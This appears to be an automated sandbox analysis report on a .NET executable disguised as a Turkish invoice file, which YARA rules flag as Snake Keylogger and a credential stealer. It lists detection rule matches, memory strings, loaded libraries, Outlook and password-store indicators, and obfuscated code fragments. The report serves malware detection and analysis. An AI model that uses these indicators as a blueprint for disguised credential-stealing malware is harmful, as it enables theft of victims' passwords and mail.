Source: FATURA VE BELGELER..exe, 00000000.00000000.1977661327.000000000077A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHJbl.exe6 vs FATURA VE BELGELER..exe
Source: FATURA VE BELGELER..exe, 00000000.00000002.1987516340.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHJbl.exe6 vs FATURA VE BELGELER..exe
Source: FATURA VE BELGELER..exe, 00000000.00000002.1987470017.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FATURA VE BELGELER..exe
Source: FATURA VE BELGELER..exe, 00000000.00000002.1988410714.0000000002B38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs FATURA VE BELGELER..exe
Source: FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs FATURA VE BELGELER..exe
Source: FATURA VE BELGELER..exe, 00000003.00000002.4443199128.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FATURA VE BELGELER..exe
Source: FATURA VE BELGELER..exe	Binary or memory string: OriginalFilenameHJbl.exe6 vs FATURA VE BELGELER..exe

Source: FATURA VE BELGELER..exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: FATURA VE BELGELER..exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, --K.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, --K.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, --K.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, --K.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, BEm2Jp6mHTFCaiDYj3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, WSy7P55k0hTS6fLHwF.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, WSy7P55k0hTS6fLHwF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, WSy7P55k0hTS6fLHwF.cs	Security API names: _0020.AddAccessRule
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, WSy7P55k0hTS6fLHwF.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, WSy7P55k0hTS6fLHwF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, WSy7P55k0hTS6fLHwF.cs	Security API names: _0020.AddAccessRule
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, BEm2Jp6mHTFCaiDYj3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FATURA VE BELGELER..exe.log

Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Mutant created: NULL

Source: FATURA VE BELGELER..exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FATURA VE BELGELER..exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FATURA VE BELGELER..exe, 00000000.00000000.1977538604.00000000006D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select * from detainedLicenses_View order by IsReleased ,DetainID;
Source: FATURA VE BELGELER..exe, 00000000.00000000.1977538604.00000000006D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: SELECT * FROM Users WHERE Username = @Username and Password=@Password;
Source: FATURA VE BELGELER..exe, 00000000.00000000.1977538604.00000000006D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select TestID from Tests where TestAppointmentID=@TestAppointmentID;mSELECT * FROM TestTypes WHERE TestTypeID = @TestTypeID
Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4445442988.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FATURA VE BELGELER..exe	ReversingLabs: Detection: 42%
Source: FATURA VE BELGELER..exe	Virustotal: Detection: 56%

Source: FATURA VE BELGELER..exe

String found in binary or memory: $42c49fa3-77d8-41fa-a100-addbd66b9f88

Source: unknown	Process created: C:\Users\user\Desktop\FATURA VE BELGELER..exe "C:\Users\user\Desktop\FATURA VE BELGELER..exe"
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process created: C:\Users\user\Desktop\FATURA VE BELGELER..exe "C:\Users\user\Desktop\FATURA VE BELGELER..exe"
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process created: C:\Users\user\Desktop\FATURA VE BELGELER..exe "C:\Users\user\Desktop\FATURA VE BELGELER..exe"	Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: FATURA VE BELGELER..exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FATURA VE BELGELER..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: FATURA VE BELGELER..exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: HJbl.pdb source: FATURA VE BELGELER..exe
Source:	Binary string: HJbl.pdbSHA256 source: FATURA VE BELGELER..exe

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, XG.cs	.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, XG.cs	.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack, XG.cs	.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})

.NET source code contains potential unpacker

Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, WSy7P55k0hTS6fLHwF.cs	.Net Code: dWfbjGfwyT System.Reflection.Assembly.Load(byte[])
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, WSy7P55k0hTS6fLHwF.cs	.Net Code: dWfbjGfwyT System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Code function: 0_2_050384C0 push eax; iretd

0_2_050384CD

Source: FATURA VE BELGELER..exe

Static PE information: section name: .text entropy: 7.6979520777268835

Source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, h0MxUAiRwfmKieeEn0.cs	High entropy of concatenated method names: 'rbXYeScFsl', 'BwXY0wXHKO', 'PphYbFbpKd', 'mj1YKs23l0', 'UyVYiMqoXZ', 'y4GYNOd3rZ', 'UVcYPrAhef', 'kxlSZs0TIO', 'hGISxij7Ha', 'vhASLiX1Ru'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, Avwu49KGxRSsoLWJIf.cs	High entropy of concatenated method names: 'oGxSDDj3tY', 'GutS1UQ9U9', 'kVYSQyuLpk', 'KdoS64TsYN', 'PqSSBPoAmC', 'PRMSfUN19n', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, or5jHvqBByl8DNsQaI.cs	High entropy of concatenated method names: 'jyFSKXkump', 'nHOSi9Fs9w', 'RyrSAZpCdp', 'KeFSNUu12I', 'tesSPEboeu', 'KEBSTcAaqO', 'lUgSvLXPYL', 'XPcSuHCKNm', 'Ia5SRMpYnh', 'DWZSJBnSbQ'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, Ce32rVukiNFuNjRUcV.cs	High entropy of concatenated method names: 'aMPVpeYSdk', 'jMNVn7Un4a', 'Q7pVDJnhen', 'ir9V1xuUq0', 'e7XV6VpuM3', 'MbfVf8llUu', 'vmrVOFC32M', 'B7LVHmMFXJ', 'tVDVFcljG2', 'I1YV5rowci'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, OAllAqXVCQegZBCPul.cs	High entropy of concatenated method names: 'U2KeTW1mNc', 'prmevVgmfR', 'EFyeRXbyKW', 'nXheJsyDDQ', 'Tq2eG8CJL9', 'Ut4ek1S8DL', 'I1qZZYS9Qw5Nt27n0F', 'ljsHEKJikqxgXYBA2T', 'uyreekKB7N', 'F1we0wgo06'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, iBFtFdGoCHLmE14Lc82.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pIZ9BDP5qa', 'LMD9aOTx8i', 'WJe9hcJOLO', 'cdr9cuZkWP', 'WBZ9oQSd2C', 'JP59X87P5I', 'uxm9ZDXkTu'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, be03F9dtp0fyw81fnC.cs	High entropy of concatenated method names: 'XFUPEMeWcG', 'C7fPiaqDfb', 'ErLPNr6MqO', 'c9YPTagRoW', 'OJVPv3AQbR', 'qioNoMOhjS', 'JapNXmNq7s', 'h9PNZlTnpF', 'FArNxLTZAw', 'JKvNLHTDQp'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, BEm2Jp6mHTFCaiDYj3.cs	High entropy of concatenated method names: 'zExiBK0oIZ', 'wPSialf2qX', 'yHtihnE5QX', 'zNCiccnUOu', 'wFuioUdUMn', 'b7qiXCXVdk', 'ceRiZ66b95', 'G6UixtD69X', 'UL2iLU9A0f', 'lVpiwBfWtv'
